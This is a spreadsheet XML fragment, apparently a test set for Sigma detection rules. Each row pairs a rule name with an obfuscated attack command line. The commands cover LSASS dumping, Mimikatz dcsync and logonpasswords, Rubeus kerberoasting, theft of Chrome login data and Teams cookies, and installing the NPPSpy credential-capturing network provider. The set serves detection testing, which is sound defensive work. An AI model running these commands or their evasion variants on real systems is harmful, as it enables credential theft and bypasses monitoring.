      </c>
      <c r="D782" s="43" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E782" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "malicious_dump.exe --full --name C:\temp\lsass.d^mp 756"</t>
        </is>
      </c>
      <c r="F782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I782" s="43" t="n"/>
      <c r="J782" s="43" t="n"/>
      <c r="K782" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B783" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C783" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D783" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E783" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I783" s="43" t="n"/>
      <c r="J783" s="43" t="n"/>
      <c r="K783" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B784" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C784" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D784" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E784" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I784" s="43" t="n"/>
      <c r="J784" s="43" t="n"/>
      <c r="K784" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B785" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C785" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D785" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E785" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I785" s="43" t="n"/>
      <c r="J785" s="43" t="n"/>
      <c r="K785" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B786" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C786" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D786" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E786" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I786" s="43" t="n"/>
      <c r="J786" s="43" t="n"/>
      <c r="K786" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B787" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C787" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D787" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E787" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I787" s="43" t="n"/>
      <c r="J787" s="43" t="n"/>
      <c r="K787" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B788" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_teams_suspicious_command_line_cred_access</t>
        </is>
      </c>
      <c r="C788" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Command Targeting Teams Sensitive Files</t>
        </is>
      </c>
      <c r="D788" s="43" t="inlineStr">
        <is>
          <t>d2eb17db-1d39-41dc-b57f-301f6512fa75</t>
        </is>
      </c>
      <c r="E788" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %APPDATA%\Microsoft\Teams &amp;&amp; copy Cookies\* C:\temp"</t>
        </is>
      </c>
      <c r="F788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I788" s="43" t="n"/>
      <c r="J788" s="43" t="n"/>
      <c r="K788" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B789" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C789" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D789" s="43" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E789" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {ls -R C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_histor""y.txt | Select-String ""password"", ""-p"", ""key"", ""pwd"", ""pass""}</t>
        </is>
      </c>
      <c r="F789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I789" s="43" t="n"/>
      <c r="J789" s="43" t="n"/>
      <c r="K789" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B790" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C790" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D790" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E790" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {get-process  lsass | Out-Minidump}</t>
        </is>
      </c>
      <c r="F790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I790" s="43" t="n"/>
      <c r="J790" s="43" t="n"/>
      <c r="K790" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B791" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C791" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D791" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E791" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {&amp; 'Get-Process' lsass | Out-Minidump}</t>
        </is>
      </c>
      <c r="F791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I791" s="43" t="n"/>
      <c r="J791" s="43" t="n"/>
      <c r="K791" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="43" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B792" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C792" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D792" s="43" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E792" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Get-Process -Name lsass | Out-Minidump}</t>
        </is>
      </c>
      <c r="F792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I792" s="43" t="n"/>
      <c r="J792" s="43" t="n"/>
      <c r="K792" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B793" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C793" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D793" s="43" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E793" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {gi "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" | % {copy $_.FullName -Destination "C:\AtomicRedTeam\ExternalPayloads"}}</t>
        </is>
      </c>
      <c r="F793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I793" s="43" t="n"/>
      <c r="J793" s="43" t="n"/>
      <c r="K793" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B794" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C794" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D794" s="43" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E794" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Copy-Item -Path "$env:LOCALAPPDATA/Google/Chrome/User Data/Default/Login Data" -Destination "C:\AtomicRedTeam\ExternalPayloads"}</t>
        </is>
      </c>
      <c r="F794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I794" s="43" t="n"/>
      <c r="J794" s="43" t="n"/>
      <c r="K794" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B795" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C795" s="43" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D795" s="43" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E795" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Set-Location "$env:LOCALAPPDATA\Google\Chrome"; Copy-Item ".\User Data\Default\Login Data" -Destination "C:\AtomicRedTeam\ExternalPayloads"}</t>
        </is>
      </c>
      <c r="F795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I795" s="43" t="n"/>
      <c r="J795" s="43" t="n"/>
      <c r="K795" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B796" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C796" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D796" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E796" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" "-u" "-f" C:\Users\Public\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I796" s="43" t="n"/>
      <c r="J796" s="43" t="n"/>
      <c r="K796" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B797" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C797" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D797" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E797" s="43" t="inlineStr">
        <is>
          <t>"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.17\createdump.exe" --full --name C:\Users\Public\dotnet-lsass.dmp  788</t>
        </is>
      </c>
      <c r="F797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I797" s="43" t="n"/>
      <c r="J797" s="43" t="n"/>
      <c r="K797" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B798" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C798" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D798" s="43" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E798" s="43" t="inlineStr">
        <is>
          <t>copy procdump.exe "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -AcceptEula -ma lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="43" t="n"/>
      <c r="J798" s="43" t="n"/>
      <c r="K798" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B799" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C799" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D799" s="43" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E799" s="43" t="inlineStr">
        <is>
          <t>copy procdump.exe "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -acCEPtEuLA -"ma" lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I799" s="43" t="n"/>
      <c r="J799" s="43" t="n"/>
      <c r="K799" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B800" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dump64_defender_av_bypass_rename</t>
        </is>
      </c>
      <c r="C800" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender AV Bypass Via Dump64.EXE Rename</t>
        </is>
      </c>
      <c r="D800" s="43" t="inlineStr">
        <is>
          <t>129966c9-de17-4334-a123-8b58172e664d</t>
        </is>
      </c>
      <c r="E800" s="43" t="inlineStr">
        <is>
          <t>copy procdump.exe "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" &amp;&amp; "\?\C:\Program Files\Microsoft Visual Studio\dump64.exe" -AccEpteulA -MA lsass.exe lsass.dmp</t>
        </is>
      </c>
      <c r="F800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I800" s="43" t="n"/>
      <c r="J800" s="43" t="n"/>
      <c r="K800" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B801" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_patterns</t>
        </is>
      </c>
      <c r="C801" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Process Patterns</t>
        </is>
      </c>
      <c r="D801" s="43" t="inlineStr">
        <is>
          <t>f26307d8-14cd-47e3-a26b-4b4769f24af6</t>
        </is>
      </c>
      <c r="E801" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "tasklist,/v,/fo,csv | findstr /i lsass"</t>
        </is>
      </c>
      <c r="F801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="43" t="n"/>
      <c r="J801" s="43" t="n"/>
      <c r="K801" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B802" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_inveigh</t>
        </is>
      </c>
      <c r="C802" s="43" t="inlineStr">
        <is>
          <t>HackTool - Inveigh Execution</t>
        </is>
      </c>
      <c r="D802" s="43" t="inlineStr">
        <is>
          <t>b99a1518-1ad5-4f65-bc95-1ffff97a8fd0</t>
        </is>
      </c>
      <c r="E802" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Temp\sys_update.exe -S^pooferIP 10.0.0.2 -S^nifferIP 10.0.0.2"</t>
        </is>
      </c>
      <c r="F802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="43" t="n"/>
      <c r="J802" s="43" t="n"/>
      <c r="K802" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B803" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C803" s="43" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D803" s="43" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E803" s="43" t="inlineStr">
        <is>
          <t>%comspec% /c "set a=li&amp; set b=st&amp; call appcmd.exe %a%%b% config /section:identity"</t>
        </is>
      </c>
      <c r="F803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H803" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I803" s="43" t="n"/>
      <c r="J803" s="43" t="n"/>
      <c r="K803" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B804" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C804" s="43" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D804" s="43" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E804" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Copy-Item "C:\AtomicRedTeam\atomics\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32" 
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER 
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy" 
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue 
$rv = New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -ErrorAction Ignore 
$rv = New-Item -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name "Class" -Value 2 -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name "Name" -Value NPPSpy -ErrorAction Ignore 
$rv = New-ItemProperty -Path ('HKLM:\SYSTEM\CurrentControlSet\' + 'Services\NPPSpy\NetworkProvider') -Name "ProviderPath" -PropertyType ExpandString -Value "%%SystemRoot%%\System32\NPPSPY.dll" -ErrorAction Ignore 
echo "[!] Please, logout and log back in."}</t>
        </is>
      </c>
      <c r="F804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H804" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I804" s="43" t="n"/>
      <c r="J804" s="43" t="n"/>
      <c r="K804" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B805" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_new_network_provider</t>
        </is>
      </c>
      <c r="C805" s="43" t="inlineStr">
        <is>
          <t>Potential Credential Dumping Attempt Using New NetworkProvider - CLI</t>
        </is>
      </c>
      <c r="D805" s="43" t="inlineStr">
        <is>
          <t>baef1ec6-2ca9-47a3-97cc-4cf2bda10b77</t>
        </is>
      </c>
      <c r="E805" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {Copy-Item "C:\AtomicRedTeam\atomics\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32" 
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER 
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy" 
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue 
$rv = New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -ErrorAction Ignore 
$rv = New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Serv*\NPPSpy\NetworkProvider" -ErrorAction Ignore 
$rv = New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Serv*\NPPSpy\NetworkProvider" -Name "Class" -Value 2 -ErrorAction Ignore 
$rv = New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Serv*\NPPSpy\NetworkProvider" -Name "Name" -Value NPPSpy -ErrorAction Ignore 
$rv = New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Serv*\NPPSpy\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%%SystemRoot%%\System32\NPPSPY.dll" -ErrorAction Ignore 
echo "[!] Please, logout and log back in."}</t>
        </is>
      </c>
      <c r="F805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H805" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="43" t="n"/>
      <c r="J805" s="43" t="n"/>
      <c r="K805" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B806" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C806" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D806" s="43" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E806" s="43" t="inlineStr">
        <is>
          <t>mimikatz.exe "lsadump""::dcsync /domain:%userdnsdomain% /user:krbtgt@%userdnsdomain%" "exit"</t>
        </is>
      </c>
      <c r="F806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H806" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="43" t="n"/>
      <c r="J806" s="43" t="n"/>
      <c r="K806" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="43" t="inlineStr">
        <is>
          <t>t1003.001</t>
        </is>
      </c>
      <c r="B807" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_mimikatz_command_line</t>
        </is>
      </c>
      <c r="C807" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution</t>
        </is>
      </c>
      <c r="D807" s="43" t="inlineStr">
        <is>
          <t>a642964e-bead-4bed-8910-1bb4d63e3b4d</t>
        </is>
      </c>
      <c r="E807" s="43" t="inlineStr">
        <is>
          <t>mimikatz.exe "privilege""::debug" "sekurlsa""::logonpasswords" "exit"</t>
        </is>
      </c>
